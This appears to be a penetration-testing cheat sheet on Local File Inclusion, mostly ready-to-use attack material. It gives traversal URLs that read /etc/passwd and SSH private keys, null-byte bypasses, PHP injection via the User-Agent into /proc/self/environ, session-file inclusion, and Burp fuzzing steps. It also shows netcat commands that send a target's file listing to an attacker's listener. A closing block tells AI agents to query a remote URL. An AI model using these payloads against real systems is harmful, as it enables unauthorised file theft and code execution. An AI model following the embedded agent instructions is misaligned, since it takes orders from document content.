# Local File Inclusion (LFI)

## Local File Inclusion

* If your path looks like a file/folder.. you might find an LFI
* Keep trying combinations until you find one.
* Or google/searchsploit a known LFI
* REF: [PhpTricks](/04-webapps/php-tricks.md), [WebInjections](/04-webapps/03-webapp.md), [PFSenseRemoteExec](/04-webapps/pfsense.md#exec-code-exploit), [CharEvasion](/03-getting-in/char-evasion-tricks.md)

```
LFI Likely:
http://$IP/dept/manage.php?notes=files/nineveh.txt

Testing:
http://$IP/dept/manage.php?notes=files/../../../../etc/passwd
http://$IP/dept/manage.php?notes=files/../../../../../../../etc/passwd
http://$IP/dept/manage.php?notes=/myNotes/../../../etc/passwd
```

## Automation

* Automate LFI Enumeration/Discovery.
* Good to add to the tool-belt when you're looking to see what sensitive files exists and are readable once you've found a LFI vulnerability. It also includes a Mode (ICE-Breaker) to scan a potential target using an encoded path traversal list - which helps in LFI discovery.
* <https://www.reddit.com/r/oscp/comments/9fxhbp/helpful_local_file_inclusion_tool_fi/>

```
nikto ..might give you one (if known)
python fi-cyberscan.py -t http://$IP/cyber.php?page= -m1
fimap -u $IP  ..in kali
```

## Whoami Home SSH:

```
whoami:
/proc/self/status  ..match 100:101 with /etc/passwd

Home directory:
/etc/passwd                    ..learn home path
/var/lib/asterisk/             ..check home path
/var/lib/asterisk/.ssh/id_rsa  ..priv ssh key here?
```

## Code exe with 'environ'

* If you have access to 'environ' - you might have code execution
* Burp > Repeater > /proc/self/environ

```
graph.php?lang=../../../proc/self/environ%00&module=Accounts
User-Agent: <?php echo "hello"; ?>
Go
```

## Fuzzing LFI

* Burp > Intercept > Send to **Intruder** > Positions
* Clear & Add: $attack$
* <https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI>
* REF: [Fuzzing](/02-scanning/fuzzing.md)

```
graph.php?lang=../../../etc/passwd%00&module=Accounts
graph.php?lang=../../../$attack$%00&module=Accounts
                           |
                         Keyword for fuzz

Payloads > Load > burp-fuzz > 
LFI-LogFileCheck.txt
LFI-InterstingFiles.txt

Start Attack
Sort by Length ..to see results
```

## RFI from LFI (php cookies)

* If you can locate the 'session' cookies
* You may be able to inject them into **Burp Repeater** to get an Execution

```
cd vtiger/  ..if you have the source
grep -R phpinfo\(\)  
maybe: Image/Canvas/PDF.php  ..if we can access?
Find where session is saved:
ex: /tmp/sess_xyz123

Repeater:
graph.php?lang=../../../tmp/sess_xyz123%00&module=Accounts
Might give you execution
```

## Directory Traversals

```
--------------------
--------------------
/images/./photo.jpg             .. ok
/images/../photo.jpg            .. error
/images/../images/photo.jpg     .. win!

http://abc.so/images/../photo.png                              ..ok
http://abc.so/images/../../../../../photo.png                  ..ok
http://abc.so/../../../../../../../../../../secret.key         ..nothing

http://abc.so/file.php?file=photo.png
http://abc.so/file.php?file=./photo.png                  .. added ./
http://abc.so/file.php?file=./file.php                   .. 'real' file.php
http://abc.so/file.php?file=./../../../../../etc/passwd  .. worked !!
http://abc.so/file.php?file=./../../../../../boot.ini    .. windows target !!


--------------------
--------------------
Filtered: Cant leave /var/www/ 

http://abc.so/
http://abc.so/file.php?file=/var/www/photo.png                           ..ok
http://abc.so/file.php?file=/secret.key                                  ..fail
http://abc.so/file.php?file=./../../../../../../../../photo.png          ..fail
http://abc.so/file.php?file=/var/www/file.php                            ..ok
http://abc.so/file.php?file=/var/www/../../../../../../../../etc/passwd  ..ok
```

## NULL BYTE

* %00 ..URL-encoded
* Adding a NULL BYTE will get rid of suffix (on older systems)
* Works well in Perl and older versions of PHP (solved since 5.3.4)
* Scenario: Server is adding .png automatically to your page

```
http://abc.so/file.php?file=photo                 .. ok
http://abc.so/file.php?file=photo.png             .. nothing
http://abc.so/file.php?file=photo.png%00          .. ok
http://abc.so/file.php?file=file.php%00           .. ok
http://abc.so/file.php?file=/../../etc/passwd%00  .. win
```

## Netcat Tricks

* Find all files on host.. send to remote
* REF: [ReverseShell](/03-getting-in/03-reverseshell-php.md#nc), [CharEvasion](/03-getting-in/char-evasion-tricks.md), [LFI](/04-webapps/lfi.md)

```
target: 
echo+abc+|nc+10.x.x.x:9000    ..test
find+/+|nc+10.x.x.x:9000      ..pull all files

kali:
nc -nvlp 9000 > findall.txt   ..receive
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/04-webapps/lfi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.